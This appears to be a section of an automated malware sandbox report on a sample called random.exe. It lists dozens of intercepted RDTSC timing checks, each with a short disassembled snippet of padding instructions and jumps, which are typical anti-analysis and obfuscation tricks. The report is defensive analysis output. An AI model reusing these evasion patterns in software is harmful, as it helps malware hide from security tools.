Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6BC second address: 93D6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6CC second address: 93D6D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6D2 second address: 93D6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6D7 second address: 93D715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F19A4F65049h 0x0000000b jc 00007F19A4F65036h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F19A4F65036h 0x0000001a jmp 00007F19A4F65040h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D85B second address: 93D864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D864 second address: 93D868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D9BD second address: 93D9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D9C1 second address: 93D9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D9C7 second address: 93D9DB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F19A4DEDF2Ch 0x00000008 jnl 00007F19A4DEDF26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DB01 second address: 93DB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DB07 second address: 93DB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDF39 second address: 8EDF50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F19A4F65038h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F19A4F6503Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDF50 second address: 8EDF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDF54 second address: 8EDFB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F19A4F65045h 0x00000008 jmp 00007F19A4F6503Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 movsx ecx, ax 0x00000013 push ebx 0x00000014 call 00007F19A4F65044h 0x00000019 sbb di, 8347h 0x0000001e pop edx 0x0000001f pop ecx 0x00000020 mov ebx, dword ptr [ebp+12482052h] 0x00000026 add eax, ebx 0x00000028 push edi 0x00000029 jmp 00007F19A4F6503Eh 0x0000002e pop edx 0x0000002f add edx, 3C4E26AFh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edx 0x0000003a pop edx 0x0000003b jng 00007F19A4F65036h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDFB8 second address: 8EDFFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F19A4DEDF28h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dx, di 0x00000029 mov edi, dword ptr [ebp+122D2B59h] 0x0000002f push 00000004h 0x00000031 cmc 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 pop eax 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDFFE second address: 8EE008 instructions: 0x00000000 rdtsc 0x00000002 js 00007F19A4F65036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DDB1 second address: 93DDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4DEDF31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DDC6 second address: 93DDCC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DED4 second address: 93DEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DEDC second address: 93DEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DEE2 second address: 93DEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93DEE6 second address: 93DEEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 941D58 second address: 941D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4DEDF2Eh 0x00000009 jmp 00007F19A4DEDF35h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94160F second address: 94162F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 jnl 00007F19A4F65049h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 945105 second address: 945110 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 945110 second address: 945129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F19A4F65036h 0x0000000a pop ecx 0x0000000b js 00007F19A4F6503Ah 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 945715 second address: 945722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnc 00007F19A4DEDF26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 945722 second address: 945742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F65040h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F19A4F65036h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 945742 second address: 945770 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jne 00007F19A4DEDF26h 0x00000012 ja 00007F19A4DEDF26h 0x00000018 popad 0x00000019 jbe 00007F19A4DEDF28h 0x0000001f pushad 0x00000020 popad 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9458CA second address: 9458CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9459EE second address: 9459F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9459F2 second address: 9459FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9459FE second address: 945A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007F19A4DEDF38h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 945A1E second address: 945A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94C804 second address: 94C83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnc 00007F19A4DEDF40h 0x0000000b push eax 0x0000000c je 00007F19A4DEDF26h 0x00000012 pop eax 0x00000013 pushad 0x00000014 jnc 00007F19A4DEDF26h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94D54F second address: 94D55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F19A4F6503Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94D55F second address: 94D587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F19A4DEDF26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F19A4DEDF38h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94D8A1 second address: 94D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 ja 00007F19A4F65036h 0x0000000e js 00007F19A4F65036h 0x00000014 jns 00007F19A4F65036h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94DB48 second address: 94DB60 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19A4DEDF26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F19A4DEDF2Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94DB60 second address: 94DB7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65044h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 94DB7A second address: 94DB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 953C3B second address: 953C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 953C53 second address: 953C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 956D50 second address: 956D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F6503Fh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 956D68 second address: 956D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 956D6C second address: 956D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F19A4F65049h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 956D8F second address: 956D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 957070 second address: 95708F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F19A4F65049h 0x0000000c jmp 00007F19A4F65043h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9574AE second address: 9574B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9574B2 second address: 9574ED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F19A4F65036h 0x00000008 jmp 00007F19A4F65040h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007F19A4F65055h 0x00000015 jmp 00007F19A4F65049h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9574ED second address: 95751E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F19A4DEDF26h 0x0000000b jmp 00007F19A4DEDF2Dh 0x00000010 jmp 00007F19A4DEDF37h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95751E second address: 957548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F19A4F6503Eh 0x0000000c jmp 00007F19A4F65045h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 957696 second address: 9576A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95782F second address: 957845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65042h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95DF86 second address: 95DF96 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F19A4DEDF28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95DF96 second address: 95DF9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95E39B second address: 95E3A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95E66B second address: 95E680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F19A4F65036h 0x0000000c popad 0x0000000d jc 00007F19A4F6503Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95E91B second address: 95E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95E921 second address: 95E92B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F19A4F65036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95E92B second address: 95E940 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F19A4DEDF30h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95EA64 second address: 95EA68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95EB96 second address: 95EB9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95EB9A second address: 95EBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F19A4F65036h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95EBA8 second address: 95EBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95ED3E second address: 95ED45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95FBCA second address: 95FBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95FBD2 second address: 95FBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 966CF8 second address: 966D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Fh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F19A4DEDF35h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 96D5F3 second address: 96D608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65041h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 96D608 second address: 96D620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F19A4DEDF2Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jne 00007F19A4DEDF26h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 96D620 second address: 96D626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 96D626 second address: 96D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 96ED8E second address: 96EDBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19A4F65049h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnl 00007F19A4F65036h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 jnp 00007F19A4F6503Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 979581 second address: 97958B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F19A4DEDF26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 97958B second address: 979599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F19A4F65038h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 979599 second address: 97959E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 97959E second address: 9795A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9795A4 second address: 9795B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F19A4DEDF26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9795B4 second address: 9795BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989C28 second address: 989C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989C2E second address: 989C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989C32 second address: 989C38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989C38 second address: 989C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jg 00007F19A4F65036h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 je 00007F19A4F65038h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F19A4F65036h 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989C5E second address: 989C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989C62 second address: 989CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F19A4F65046h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F19A4F65046h 0x00000017 popad 0x00000018 push ebx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989A9A second address: 989AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 989AA0 second address: 989AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F19A4F65038h 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F19A4F65036h 0x00000015 jmp 00007F19A4F6503Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 992105 second address: 99212A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F19A4DEDF26h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F19A4DEDF33h 0x00000011 jnl 00007F19A4DEDF26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9923D6 second address: 9923E2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F19A4F65036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99479F second address: 9947EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4DEDF2Ah 0x00000009 pop edi 0x0000000a jmp 00007F19A4DEDF35h 0x0000000f pushad 0x00000010 jmp 00007F19A4DEDF38h 0x00000015 jmp 00007F19A4DEDF2Bh 0x0000001a js 00007F19A4DEDF26h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9947EF second address: 99480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F19A4F6503Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jp 00007F19A4F65036h 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99480A second address: 99480E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
